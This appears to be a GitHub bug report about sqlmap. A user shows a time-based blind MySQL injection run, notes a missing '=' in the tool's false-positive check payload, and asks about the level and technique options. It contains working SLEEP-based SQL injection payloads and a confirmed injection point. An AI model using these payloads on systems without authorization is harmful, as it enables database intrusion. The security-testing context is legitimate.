Closed
Description
❯ python3 ~/Documents/github/sqlmap/sqlmap.py -r req --proxy http://127.0.0.1:8080 --level=5 --risk=1 --technique=T --dbms=MySQL
___
__H__
___ ___[(]_____ ___ ___ {1.6.9.3#dev}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:01:12 /2022-09-30/
[10:01:12] [INFO] parsing HTTP request from 'req'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
[10:01:14] [INFO] testing connection to the target URL
[10:01:16] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[10:01:17] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[10:01:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:01:17] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[10:02:43] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided risk (1) value? [Y/n]
[10:04:27] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
[10:04:58] [WARNING] false positive or unexploitable injection point detected
[10:04:58] [WARNING] (custom) POST parameter '#1*' does not seem to be injectable
[10:04:58] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. Rerun without providing the option '--technique'. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[10:04:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 52 times
[*] ending @ 10:04:58 /2022-09-30/
The payload that sqlmap used to detect the vulnerability is the following:
+(SELECT 0x5a624251 WHERE 5450=5450 AND (SELECT 3805 FROM (SELECT(SLEEP(5-(IF(32=32,0,5)))))evRB))+1It used this one to confirm if a false positive:
+(SELECT 0x6c725141 WHERE 3306=3306 AND (SELECT 5898 FROM (SELECT(SLEEP(5-(IF(51 32,0,5)))))EeZD))+1The second payload resulted in a 500 error but the first payload is actually a real vulnerability.
The difference is in the IF, IF(32=32,0,5) vs IF(51 32,0,5) the = is missing.
This appears to be a bug.
Reruning the same command ended up finding the following injection point:
sqlmap identified the following injection point(s) with a total of 102 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: product_question[pid]=+(SELECT 0x5649517a WHERE 7165=7165 AND (SELECT 6014 FROM (SELECT(SLEEP(5)))jMDp))+1
---
I have two related questions:
- Can I specify a level and only send tests for this level ? I had to use level 5 in this case so I would like to be able to only send tests for level 5.
- How can I rerun sqlmap with this specific technique ?
MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
FYI: Burp was able to find this SQLi with ~80 requests and the following payload was identified:
(select*from(select(sleep(20)))a)Thanks